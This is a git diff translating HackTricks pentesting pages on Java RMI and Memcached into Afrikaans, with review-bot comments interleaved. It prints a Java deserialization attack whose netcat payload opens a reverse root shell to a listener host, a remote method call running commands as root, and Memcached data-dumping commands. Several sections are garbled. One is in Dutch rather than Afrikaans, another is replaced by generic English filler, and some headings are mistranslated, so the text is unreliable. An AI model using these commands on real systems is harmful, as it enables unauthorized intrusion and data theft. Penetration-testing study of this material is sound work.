_Java RMI_ vulnerability scanner that is capable of identifying common _RMI vulnerabilities_ automatically. 
Whenever you identify an _RMI_ endpoint, you should give it a try: +## RMI Enumerasie +[remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) is 'n _Java RMI_-kwesbaarheidsskanderingsinstrument wat outomaties algemene _RMI-kwesbaarhede_ kan identifiseer. Telkens wanneer jy 'n _RMI_-eindpunt identifiseer, moet jy dit probeer: ``` $ rmg enum 172.17.0.2 9010 [+] RMI registry bound names: @@ -148,11 +143,9 @@ $ rmg enum 172.17.0.2 9010 [+] --> Deserialization allowed - Vulnerability Status: Vulnerable [+] --> Client codebase enabled - Configuration Status: Non Default ``` +Die uitset van die enumerasie-aksie word in meer detail verduidelik in die [dokumentasiebladsye](https://github.com/qtc-de/remote-method-guesser/blob/master/docs/rmg/actions.md#enum-action) van die projek. Afhangende van die resultaat, moet jy probeer om geïdentifiseerde kwesbaarhede te verifieer. -The output of the enumeration action is explained in more detail in the [documentation pages](https://github.com/qtc-de/remote-method-guesser/blob/master/docs/rmg/actions.md#enum-action) of the project. Depending on the outcome, you should try to verify identified vulnerabilities. - -The `ObjID` values displayed by _remote-method-guesser_ can be used to determine the uptime of the service. This may allows to identify other vulnerabilities: - +Die `ObjID`-waardes wat deur _remote-method-guesser_ vertoon word, kan gebruik word om die bedryfstyd van die diens te bepaal. Dit kan help om ander kwesbaarhede te identifiseer: ``` $ rmg objid '[55ff5a5d:17e0501b054:-7ff8, -4004948013687638236]' [+] Details for ObjID [55ff5a5d:17e0501b054:-7ff8, -4004948013687638236] 
@@ -163,13 +156,11 @@ $ rmg objid '[55ff5a5d:17e0501b054:-7ff8, -4004948013687638236]' [+] Time: 1640761503828 (Dec 29,2021 08:05) [+] Count: -32760 ``` +## Bruteforcing van Afgeleë Metodes -## Bruteforcing Remote Methods - -Even when no vulnerabilities have been identified during enumeration, the available _RMI_ services could still expose dangerous functions. Furthermore, despite _RMI_ communication to _RMI_ default components is protected by deserialization filters, when talking to custom _RMI_ services, such filters are usually not in place. Knowing valid method signatures on _RMI_ services is therefore valuable. - -Unfortunately, _Java RMI_ does not support enumerating methods on _remote objects_. That being said, it is possible to bruteforce method signatures with tools like [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) or [rmiscout](https://github.com/BishopFox/rmiscout): +Selfs wanneer geen kwesbaarhede tydens enumerasie geïdentifiseer is nie, kan die beskikbare _RMI_ dienste steeds gevaarlike funksies blootstel. Verder, alhoewel _RMI_ kommunikasie na _RMI_ standaard komponente beskerm word deur deserialisasie filters, is sulke filters gewoonlik nie teenwoordig wanneer daar met aangepaste _RMI_ dienste gepraat word nie. Dit is dus waardevol om geldige metode handtekeninge op _RMI_ dienste te ken. +Ongelukkig ondersteun _Java RMI_ nie die opname van metodes op _afgeleë voorwerpe_ nie. Dit gesê, is dit moontlik om metode handtekeninge te bruteforce met behulp van gereedskap soos [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) of [rmiscout](https://github.com/BishopFox/rmiscout): ``` $ rmg guess 172.17.0.2 9010 [+] Reading method candidates from internal wordlist rmg.txt 
@@ -199,16 +190,12 @@ $ rmg guess 172.17.0.2 9010 [+] --> void releaseRecord(int recordID, String tableName, Integer remoteHashCode) [+] --> String login(java.util.HashMap dummy1) ``` - -Identified methods can be called like this: - +Geïdentifiseerde metodes kan soos volg geroep word: ``` -$ rmg call 172.17.0.2 9010 '"id"' --bound-name plain-server --signature "String execute(String dummy)" --plugin GenericPrint.jar +$ rmg call 172.17.0.2 9010 '"id"' --bound-name plain-server --signature "String execute(String dummy)" --plugin GenericPrint.jar [+] uid=0(root) gid=0(root) groups=0(root) ``` - -Or you can perform deserialization attacks like this: - +Of jy kan deserialisasie-aanvalle soos hierdie uitvoer: ``` $ rmg serial 172.17.0.2 9010 CommonsCollections6 'nc 172.17.0.1 4444 -e ash' --bound-name plain-server --signature "String execute(String dummy)" [+] Creating ysoserial payload... done. 
@@ -231,20 +218,18 @@ Ncat: Connection from 172.17.0.2:45479. id uid=0(root) gid=0(root) groups=0(root) ``` +Meer inligting kan gevind word in hierdie artikels: -More information can be found in these articles: - -* [Attacking Java RMI services after JEP 290](https://mogwailabs.de/de/blog/2019/03/attacking-java-rmi-services-after-jep-290/) -* [Method Guessing](https://github.com/qtc-de/remote-method-guesser/blob/master/docs/rmg/method-guessing.md) +* [Aanvalle op Java RMI-dienste na JEP 290](https://mogwailabs.de/de/blog/2019/03/attacking-java-rmi-services-after-jep-290/) +* [Metode Raai](https://github.com/qtc-de/remote-method-guesser/blob/master/docs/rmg/method-guessing.md) * [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) * [rmiscout](https://bishopfox.com/blog/rmiscout) -Apart from guessing, you should also look in search engines or _GitHub_ for the interface or even the implementation of an encountered _RMI_ service. The _bound name_ and the name of the implemented class or interface can be helpful here. +Afgesien van raaiwerk, moet jy ook soekmasjiene of _GitHub_ deursoek vir die koppelvlak of selfs die implementering van 'n gevonde _RMI_ diens. Die "gebonden naam" en die naam van die geïmplementeerde klas of koppelvlak kan hier nuttig wees. -## Known Interfaces - -[remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) marks classes or interfaces as `known` if they are listed in the tool's internal database of known _RMI services_. In these cases you can use the `known` action to get more information on the corresponding _RMI service_: +## Bekende Koppelvlakke +[remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) merk klasse of koppelvlakke as `bekend` as hulle in die interne databasis van bekende _RMI-dienste_ van die instrument gelys word. 
In hierdie gevalle kan jy die `bekend` aksie gebruik om meer inligting oor die betrokke _RMI-diens_ te verkry: ``` $ rmg enum 172.17.0.2 1090 | head -n 5 [+] RMI registry bound names: @@ -303,51 +288,47 @@ $ rmg known javax.management.remote.rmi.RMIServerImpl_Stub [+] References: [+] - https://github.com/qtc-de/beanshooter ``` - ## Shodan * `port:1099 java` -## Tools +## Gereedskap * [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) * [rmiscout](https://github.com/BishopFox/rmiscout) * [BaRMIe](https://github.com/NickstaDB/BaRMIe) -## References +## Verwysings * [https://github.com/qtc-de/remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) -## HackTricks Automatic Commands - +## HackTricks Outomatiese Opdragte ``` Protocol_Name: Java RMI #Protocol Abbreviation if there is one. Port_Number: 1090,1098,1099,1199,4443-4446,8999-9010,9999 #Comma separated if there is more than one. Protocol_Description: Java Remote Method Invocation #Protocol Abbreviation Spelled out Entry_1: - Name: Enumeration - Description: Perform basic enumeration of an RMI service - Command: rmg enum {IP} {PORT} +Name: Enumeration +Description: Perform basic enumeration of an RMI service +Command: rmg enum {IP} {PORT} ``` -
-\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en outomatiese werksvloeie te bou met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
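Review bot: the `@@ -58,37 +55,35 @@` hunk strips all leading indentation from the Java `ExampleClient` listing (`- private static final String remoteHost = "172.17.0.2";` becomes `+private static final String remoteHost = "172.17.0.2";`, and the whole `main` body is flattened the same way), which changes a code block in a commit that should only touch prose; restore the original indentation and leave fenced code untouched. The same applies to the `HackTricks Automatic Commands` block in the `@@ -303,51 +288,47 @@` hunk, where `- Name: Enumeration` / `- Description: ...` / `- Command: rmg enum {IP} {PORT}` lose the indentation that nests them under `Entry_1:`, and to the whitespace-only change of the `$ rmg call 172.17.0.2 9010 '"id"' ...` line in `@@ -199,16 +190,12 @@`. Two translation points in the same region: the literal tool action `known` is rendered as `` `bekend` `` ("merk klasse of koppelvlakke as `bekend`", "die `bekend` aksie"), but it is the `rmg known` subcommand shown in the adjacent `$ rmg known javax.management.remote.rmi.RMIServerImpl_Stub` listing, so backticked identifiers must stay in English; and the registry is called `_RMI-register_` in the body but `_RMI-registreerder_` in the `ObjID = 0` list item, so pick one term.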
diff --git a/network-services-pentesting/11211-memcache/README.md b/network-services-pentesting/11211-memcache/README.md index 26c6a5f96..a023845e4 100644 --- a/network-services-pentesting/11211-memcache/README.md +++ b/network-services-pentesting/11211-memcache/README.md @@ -2,45 +2,42 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Protocol Information +## Protokol-inligting -From [wikipedia](https://en.wikipedia.org/wiki/Memcached): +Van [wikipedia](https://en.wikipedia.org/wiki/Memcached): -> **Memcached** (pronunciation: mem-cashed, mem-cash-dee) is a general-purpose distributed [memory caching](https://en.wikipedia.org/wiki/Memory\_caching) system. It is often used to speed up dynamic database-driven websites by caching data and objects in RAM to reduce the number of times an external data source (such as a database or API) must be read. +> **Memcached** (uitspraak: mem-cashed, mem-cash-dee) is 'n algemene verspreide [geheue-caching](https://en.wikipedia.org/wiki/Memory\_caching)-sisteem. Dit word dikwels gebruik om dinamiese databasis-aangedrewe webwerwe te versnel deur data en voorwerpe in RAM te kasheer om die aantal kere wat 'n eksterne data-bron (soos 'n databasis of API) gelees moet word, te verminder. -Although Memcached supports SASL, most instances are **exposed without authentication**. - -**Default port:** 11211 +Alhoewel Memcached SASL ondersteun, word die meeste instansies **sonder outentifikasie blootgestel**. +**Verstekpoort:** 11211 ``` PORT STATE SERVICE 11211/tcp open unknown ``` +## Opstel -## Enumeration +### Handleiding -### Manual +Om alle inligting wat binne 'n memcache-instantie gestoor is, uit te voer, moet jy die volgende doen: -To exfiltrate all the information saved inside a memcache instance you need to: - -1. Find **slabs** with **active items** -2. Get the **key names** of the slabs detected before -3. Ex-filtrate the **saved data** by **getting the key names** - -Remember that this service is just a **cache**, so **data may be appearing and disappearing**. +1. Vind **slabs** met **aktiewe items** +2. Kry die **sleutelname** van die voorheen opgespoorde slabs +3. Voer die **gestoorde data** uit deur die sleutelname te kry +Onthou dat hierdie diens net 'n **kasgeheue** is, so **data kan verskyn en verdwyn**. 
```bash echo "version" | nc -vn -w 1 11211 #Get version echo "stats" | nc -vn -w 1 11211 #Get status 
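Review bot: in the `@@ -2,45 +2,42 @@` hunk `-## Enumeration` is translated as `+## Opstel` ("setup"), which is both wrong and inconsistent with `## RMI Enumerasie` used in the Java RMI file of this same commit; use `## Enumerasie`. Likewise `-### Manual` becomes `+### Handleiding` (a handbook), where the section means doing the enumeration by hand, so `### Handmatig` is the intended sense. The hunk also drops the blank line that separated `**Verstekpoort:** 11211` from the following ``` fence; keep the blank lines around fences as in the source so the rendering matches the other pages.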
@@ -53,147 +50,188 @@ echo "get " | nc -vn -w 1 11211 #Get saved info sudo apt-get install php-memcached php -r '$c = new Memcached(); $c->addServer("localhost", 11211); var_dump( $c->getAllKeys() );' ``` +### Handleiding2 -### Manual2 +Memcached is een gedistribueerd geheugencachesysteem dat wordt gebruikt om de prestaties van dynamische webtoepassingen te verbeteren door veelgebruikte gegevens in het geheugen op te slaan. Het draait op poort 11211 en kan worden benaderd via het TCP-protocol. +#### Memcached-commando's + +Hier zijn enkele veelgebruikte Memcached-commando's: + +- **set**: Hiermee kunt u een waarde instellen voor een specifieke sleutel. +- **get**: Hiermee kunt u de waarde ophalen die is gekoppeld aan een specifieke sleutel. +- **add**: Hiermee kunt u een waarde toevoegen aan een specifieke sleutel, maar alleen als de sleutel nog niet bestaat. +- **replace**: Hiermee kunt u de waarde vervangen die is gekoppeld aan een specifieke sleutel, maar alleen als de sleutel al bestaat. +- **delete**: Hiermee kunt u een specifieke sleutel en de bijbehorende waarde verwijderen. +- **incr**: Hiermee kunt u de waarde van een specifieke sleutel met een bepaald bedrag verhogen. +- **decr**: Hiermee kunt u de waarde van een specifieke sleutel met een bepaald bedrag verlagen. + +#### Memcached-aanvallen + +Memcached kan kwetsbaar zijn voor verschillende aanvallen, zoals: + +- **Memcached DDoS-aanval**: Een aanvaller kan een DDoS-aanval uitvoeren door een groot aantal valse verzoeken naar een Memcached-server te sturen, waardoor de server overbelast raakt en niet meer reageert op legitieme verzoeken. +- **Memcached-gegevenslek**: Als een Memcached-server onjuist is geconfigureerd en toegankelijk is vanaf het internet, kan een aanvaller gevoelige gegevens uit het cachegeheugen extraheren. +- **Memcached-misbruik van onbeveiligde commando's**: Een aanvaller kan onbeveiligde Memcached-commando's misbruiken om gegevens te wijzigen, te verwijderen of te stelen. 
+ +#### Memcached-pentesten + +Bij het uitvoeren van een pentest op een Memcached-server, zijn hier enkele belangrijke stappen om te volgen: + +1. Identificeer de Memcached-server en bepaal of deze toegankelijk is vanaf het internet. +2. Voer een poortscan uit om te controleren of poort 11211 open is. +3. Gebruik de Memcached-commando's om gegevens te manipuleren en kwetsbaarheden te identificeren. +4. Voer een DDoS-test uit om de veerkracht van de server te testen tegen een aanval. +5. Controleer de configuratie van de Memcached-server om ervoor te zorgen dat deze correct is beveiligd. + +#### Memcached-beveiligingstips + +Om de beveiliging van een Memcached-server te verbeteren, kunt u de volgende maatregelen nemen: + +- Beperk de toegang tot de Memcached-server tot vertrouwde IP-adressen. +- Schakel authenticatie in om ervoor te zorgen dat alleen geautoriseerde gebruikers toegang hebben. +- Beveilig de communicatie met de Memcached-server door gebruik te maken van versleuteling. +- Houd de Memcached-software up-to-date met de nieuwste patches en beveiligingsupdates. +- Controleer regelmatig de configuratie van de Memcached-server om ervoor te zorgen dat deze correct is geconfigureerd en beveiligd. + +#### Bronnen + +- [Memcached-documentatie](https://memcached.org/documentation) +- [Memcached Security Best Practices](https://www.memcached.org/security) +- [Memcached DDoS Attacks](https://www.cloudflare.com/learning/ddos/memcached-ddos-attack/) ```bash sudo apt install libmemcached-tools memcstat --servers=127.0.0.1 #Get stats memcdump --servers=127.0.0.1 #Get all items memccat --servers=127.0.0.1 #Get info inside the item(s) ``` +### Outomaties -### Automatic +Memcached is a widely used in-memory caching system that is often deployed in web applications to improve performance. However, misconfigurations in Memcached can lead to security vulnerabilities that can be exploited by attackers. +Memcached is a network service that listens on port 11211 by default. 
It uses a simple text-based protocol, making it easy to interact with using tools like telnet or netcat. + +One common misconfiguration is leaving Memcached exposed to the internet without any authentication or access controls. This allows anyone to connect to the service and perform various operations, including retrieving and modifying data. + +Attackers can take advantage of this misconfiguration to launch distributed denial-of-service (DDoS) attacks by sending a large number of requests to the Memcached service, overwhelming the target server's resources. + +To automate the process of identifying and exploiting misconfigured Memcached instances, you can use tools like Memcrashed and DDoS-Memcached. These tools leverage the Memcached protocol to send a large number of requests to the target server, causing it to consume excessive resources and potentially crash. + +It is important to note that exploiting misconfigured Memcached instances is illegal and unethical. It is recommended to only perform these actions in a controlled environment with proper authorization. + +To protect against Memcached attacks, it is crucial to properly configure and secure Memcached instances. This includes enabling authentication, restricting access to trusted IP addresses, and monitoring for any suspicious activity. + +By understanding the potential risks and taking appropriate security measures, you can mitigate the vulnerabilities associated with Memcached and ensure the integrity and availability of your web applications. 
```bash nmap -n -sV --script memcached-info -p 11211 #Just gather info msf > use auxiliary/gather/memcached_extractor #Extracts saved data -msf > use auxiliary/scanner/memcached/memcached_amp #Check is UDP DDoS amplification attack is possible +msf > use auxiliary/scanner/memcached/memcached_amp #Check is UDP DDoS amplification attack is possible ``` +## **Dumping Memcache Sleutels** -## **Dumping Memcache Keys** +In die wêreld van memcache, 'n protokol wat help om data te organiseer deur middel van slabs, bestaan daar spesifieke bevele om die gestoorde data te ondersoek, alhoewel met merkbare beperkings: -In the realm of memcache, a protocol that assists in organizing data by slabs, specific commands exist for inspecting the stored data, albeit with notable constraints: +1. Sleutels kan slegs gedump word volgens slab-klas, wat sleutels van soortgelyke inhoudsgrootte groepeer. +2. Daar is 'n limiet van een bladsy per slab-klas, wat gelykstaan aan 1MB data. +3. Hierdie funksie is onoffisieel en kan enige tyd gestaak word, soos bespreek in [gemeenskapsforums](https://groups.google.com/forum/?fromgroups=#!topic/memcached/1-T8I-RVGKM). -1. Keys can only be dumped by slab class, grouping keys of similar content size. -2. A limit exists of one page per slab class, equating to 1MB of data. -3. This feature is unofficial and may be discontinued at any time, as discussed in [community forums](https://groups.google.com/forum/?fromgroups=#!topic/memcached/1-T8I-RVGKM). +Die beperking om slegs 1MB te kan dump van moontlik gigabytes data is veral betekenisvol. Nietemin kan hierdie funksionaliteit steeds insig bied in sleutelgebruikspatrone, afhangende van spesifieke behoeftes. Vir diegene wat minder belangstel in die meganika, onthul 'n besoek aan die [gereedskap-afdeling](https://lzone.de/cheat-sheet/memcached#tools) hulpmiddels vir omvattende dumping. Alternatiewelik word die proses om telnet te gebruik vir direkte interaksie met memcached-opsette hieronder uiteengesit. 
-The limitation of only being able to dump 1MB from potentially gigabytes of data is particularly significant. However, this functionality can still offer insights into key usage patterns, depending on specific needs. For those less interested in the mechanics, a visit to the [tools section](https://lzone.de/cheat-sheet/memcached#tools) reveals utilities for comprehensive dumping. Alternatively, the process of using telnet for direct interaction with memcached setups is outlined below. - -### **How it Works** - -Memcache's memory organization is pivotal. Initiating memcache with the "-vv" option reveals the slab classes it generates, as shown below: +### **Hoe dit Werk** +Memcache se geheue-organisasie is van kardinale belang. Deur memcache te inisieer met die "-vv" opsie, word die slab-klasse wat dit genereer, onthul, soos hieronder getoon: ```bash $ memcached -vv slab class 1: chunk size 96 perslab 10922 [...] ``` - -To display all currently existing slabs, the following command is used: - +Om al die tans bestaande slabs te vertoon, word die volgende bevel gebruik: ```bash stats slabs ``` - -Adding a single key to memcached 1.4.13 illustrates how slab classes are populated and managed. For instance: - +Die toevoeging van 'n enkele sleutel tot memcached 1.4.13 illustreer hoe slabsklasse bevolk en bestuur word. Byvoorbeeld: ```bash set mykey 0 60 1 1 STORED ``` - -Executing the "stats slabs" command post key addition yields detailed statistics about slab utilization: - +Die uitvoering van die "stats slabs" bevel na sleutel byvoeging lewer gedetailleerde statistieke oor die gebruik van slabs: ```bash stats slabs [...] ``` +Hierdie uitset toon die aktiewe slabs, gebruikte stukke en operasionele statistieke, wat insig bied in die doeltreffendheid van lees- en skryfoperasies. -This output reveals the active slab types, utilized chunks, and operational statistics, offering insights into the efficiency of read and write operations. 
- -Another useful command, "stats items", provides data on evictions, memory constraints, and item lifecycles: - +'n Ander nuttige bevel, "stats items", verskaf data oor verwyderings, geheuebeperkings en itemlewensiklusse: ```bash stats items [...] ``` +Hierdie statistieke maak dit moontlik om opgevoede aannames te maak oor die gedrag van toepassingskaping, insluitend kapingseffektiwiteit vir verskillende inhoudsgroottes, geheue-toewysing en kapasiteit vir die kaping van groot voorwerpe. -These statistics allow for educated assumptions about application caching behavior, including cache efficiency for different content sizes, memory allocation, and capacity for caching large objects. - -### **Dumping Keys** - -For versions prior to 1.4.31, keys are dumped by slab class using: +### **Sleutels dump** +Vir weergawes vóór 1.4.31 word sleutels gedump deur gebruik te maak van slab-klas: ```bash stats cachedump ``` - -For example, to dump a key in class #1: - +Byvoorbeeld, om 'n sleutel in klas #1 te dump: ```bash stats cachedump 1 1000 ITEM mykey [1 b; 1350677968 s] END ``` +Hierdie metode loop oor slab klasse, onttrek en opsioneel dump sleutelwaardes. -This method iterates over slab classes, extracting and optionally dumping key values. - -### **DUMPING MEMCACHE KEYS (VER 1.4.31+)** - -With memcache version 1.4.31 and above, a new, safer method for dumping keys in a production environment is introduced, utilizing non-blocking mode as detailed in the [release notes](https://github.com/memcached/memcached/wiki/ReleaseNotes1431). This approach generates extensive output, hence the recommendation to employ the 'nc' command for efficiency. 
Examples include: +### **DUMPING MEMCACHE SLEUTELS (VER 1.4.31+)** +Met memcache weergawe 1.4.31 en hoër, word 'n nuwe, veiliger metode vir die dump van sleutels in 'n produksie-omgewing geïntroduceer, deur gebruik te maak van nie-blokkerende modus soos beskryf in die [vrystellingsnotas](https://github.com/memcached/memcached/wiki/ReleaseNotes1431). Hierdie benadering genereer uitgebreide uitset, daarom word die aanbeveling gemaak om die 'nc' opdrag vir doeltreffendheid te gebruik. Voorbeelde sluit in: ```bash echo 'lru_crawler metadump all' | nc 127.0.0.1 11211 | head -1 echo 'lru_crawler metadump all' | nc 127.0.0.1 11211 | grep ee6ba58566e234ccbbce13f9a24f9a28 ``` +### **DUMPING GEREEDSKAP** -### **DUMPING TOOLS** +Tabel [van hier](https://lzone.de/blog). -Table [from here](https://lzone.de/blog). +| Programmeertaal | Gereedskap | Funksionaliteit | | | +| --------------- | ---------------------------------------------------------------------------------------------------------------------------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------- | --------------------------------------------------------------------------- | ------- | +| PHP | [eenvoudige skripsie](http://snipt.org/xtP) | Druk sleutelname. | | | +| Perl | [eenvoudige skripsie](https://wiki.jasig.org/download/attachments/13572172/memcached-clean.pl?version=1\&modificationDate=1229693957401) | Druk sleutels en waardes af | | | +| Ruby | [eenvoudige skripsie](https://gist.github.com/1365005) | Druk sleutelname. 
| | | +| Perl | [memdump](https://search.cpan.org/\~dmaki/Memcached-libmemcached-0.4202/src/libmemcached/docs/memdump.pod) | Gereedskap in CPAN-module | [Memcached-libmemcached](https://search.cpan.org/\~dmaki/Memcached-libmemc) | ached/) | +| PHP | [memcache.php](http://livebookmark.net/journal/2008/05/21/memcachephp-stats-like-apcphp/) | Memcache Monitoringskerm wat ook sleutels kan dump | | | +| libmemcached | [peep](http://blog.evanweaver.com/2009/04/20/peeping-into-memcached/) | **Bevries jou memcached-proses!!!** Wees versigtig wanneer jy dit in produksie gebruik. Deur dit te gebruik, kan jy die 1MB-beperking omseil en **alle** sleutels regtig dump. | | | -| Programming Languages | Tools | Functionality | | | -| --------------------- | ---------------------------------------------------------------------------------------------------------------------------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------- | --------------------------------------------------------------------------- | ------- | -| PHP | [simple script](http://snipt.org/xtP) | Prints key names. | | | -| Perl | [simple script](https://wiki.jasig.org/download/attachments/13572172/memcached-clean.pl?version=1\&modificationDate=1229693957401) | Prints keys and values | | | -| Ruby | [simple script](https://gist.github.com/1365005) | Prints key names. 
| | | -| Perl | [memdump](https://search.cpan.org/\~dmaki/Memcached-libmemcached-0.4202/src/libmemcached/docs/memdump.pod) | Tool in CPAN module | [Memcached-libmemcached](https://search.cpan.org/\~dmaki/Memcached-libmemc) | ached/) | -| PHP | [memcache.php](http://livebookmark.net/journal/2008/05/21/memcachephp-stats-like-apcphp/) | Memcache Monitoring GUI that also allows dumping keys | | | -| libmemcached | [peep](http://blog.evanweaver.com/2009/04/20/peeping-into-memcached/) | **Does freeze your memcached process!!!** Be careful when using this in production. Still using it you can workaround the 1MB limitation and really dump **all** keys. | | | +## Probleemoplossing -## Troubleshooting +### 1MB Data Beperking -### 1MB Data Limit +Let daarop dat voor memcached 1.4 kan jy nie voorwerpe groter as 1MB stoor nie as gevolg van die verstek maksimum slabs grootte. -Note that prio to memcached 1.4 you cannot store objects larger than 1MB due to the default maximum slab size. +### Stel nooit 'n tydsbeperking > 30 dae nie! -### Never Set a Timeout > 30 Days! - -If you try to “set” or “add” a key with a timeout bigger than the allowed maximum you might not get what you expect because memcached then treats the value as a Unix timestamp. Also if the timestamp is in the past it will do nothing at all. Your command will silently fail. - -So if you want to use the maximum lifetime specify 2592000. Example: +As jy probeer om 'n sleutel met 'n tydsbeperking groter as die toegelate maksimum te "stel" of "toe te voeg", mag jy nie kry wat jy verwag nie, omdat memcached dan die waarde as 'n Unix-timestamp hanteer. As die tydstempel in die verlede is, sal dit niks doen nie. Jou opdrag sal stilweg misluk. +As jy dus die maksimum leeftyd wil gebruik, spesifiseer 2592000. 
Voorbeeld: ``` set my_key 0 2592000 1 1 ``` +### Verdwynende Sleutels by Oorvloei -### Disappearing Keys on Overflow +Ten spyte van die dokumentasie wat iets sê oor die oorvloei van 'n waarde van 64-biet, veroorsaak die gebruik van "incr" dat die waarde verdwyn. Dit moet weer geskep word deur gebruik te maak van "add"/"set". -Despite the documentation saying something about wrapping around 64bit overflowing a value using “incr” causes the value to disappear. It needs to be created using “add”/”set” again. +### Replikasie -### Replication +memcached ondersteun nie self replikasie nie. As jy dit regtig nodig het, moet jy van derde party-oplossings gebruik maak: -memcached itself does not support replication. If you really need it you need to use 3rd party solutions: +* [repcached](http://repcached.lab.klab.org/): Multi-meester asynchrone replikasie (memcached 1.2-patchstel) +* [Couchbase memcached-interface](http://www.couchbase.com/memcached): Gebruik CouchBase as 'n memcached-drop-in +* [yrmcds](https://cybozu.github.io/yrmcds/): memcached-kompatibele Meester-Slaaf sleutelwaardestoor +* [twemproxy](https://github.com/twitter/twemproxy) (aka nutcracker): proksi met memcached-ondersteuning -* [repcached](http://repcached.lab.klab.org/): Multi-master async replication (memcached 1.2 patch set) -* [Couchbase memcached interface](http://www.couchbase.com/memcached): Use CouchBase as memcached drop-in -* [yrmcds](https://cybozu.github.io/yrmcds/): memcached compatible Master-Slave key value store -* [twemproxy](https://github.com/twitter/twemproxy) (aka nutcracker): proxy with memcached support - -### Commands Cheat-Sheet +### Opdrag Spiekbriefie {% content-ref url="memcache-commands.md" %} [memcache-commands.md](memcache-commands.md) 
@@ -204,20 +242,20 @@ memcached itself does not support replication. If you really need it you need to * `port:11211 "STAT pid"` * `"STAT pid"` -## References +## Verwysings * [https://lzone.de/cheat-sheet/memcached](https://lzone.de/cheat-sheet/memcached)
